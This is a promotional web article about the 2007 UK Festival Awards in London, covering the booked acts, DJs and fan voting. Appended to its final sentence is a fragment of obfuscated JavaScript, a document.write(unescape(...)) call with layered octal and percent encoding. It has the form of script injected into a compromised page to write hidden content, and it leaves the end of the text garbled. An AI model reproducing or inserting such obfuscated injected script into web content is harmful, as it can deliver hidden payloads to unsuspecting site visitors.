The UK Festival Awards are gearing up to celebrate another amazing year of music festivals, at a star-studded bash in London. Some of the year's best breakthrough bands will be performing to the UK's most influential festival organisers, including Glastonbury, The Carling Weekend and Bestival, all under one roof.
The Awards will take place at Koko in Camden, London, on Tuesday, 6 November, with the dazzling Cuban Brothers hosting the night. The bash will also feature festival favorites of the future, including The Brightlights, Scouting For Girls, plus a third secret act…
With songs about lust, guilt, naughty politicians and disastrous weekends, The Brightlights look set to light up the music world. The Grimsby four-piece, who have already been compared favorably to the likes of Kings Of Leon, won this year's Road To V competition and, with it, the opportunity to open V Festival on the main stage. Next year we predict The Brightlights to be shining at many more festivals, especially after this performance in front of those who book the line-ups!
Second up we have the hugely talented Scouting For Girls. Formed in 2005, these three lads of the sunny south-east hit the top 10 this summer with the anthem 'She's So Lovely' and played a number of festivals, including Latitude and Glastonbury. They have already been booked for several festivals next year and their presence at the UK Festival Awards is bound to attract even more interest.
The third band to play the awards is being kept tightly under wraps until the evening, but we promise you they are one of the top bands in the country at the moment and are poised for global stardom. This will be one of the final chances to see them play such an intimate gig before they take over the world!
We also welcome ex-Beta Band genius Steve Mason, who'll be DJing at the after party along with Tall Paul, who is performing an exclusive alternative set. This incredible evening will see a unique line up watched by almost every festival organiser in the country. More than 20 awards will be presented throughout the evening to celebrate the organisers, artists, songs and moments that sculpted the 2007 festival season.
What makes the UK Festival Awards so unique is the fact that they are the industry's only acknowledgment, voted for by the people who really matter – the fans. Have your say and set the standard for next year by voting now at www.festivalawards.com
As well as making a difference to the festival scene, the website will also qualify voters for an exclusive money-can't-buy prize draw to win a pair of tickets to every winning festival in 2008!document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
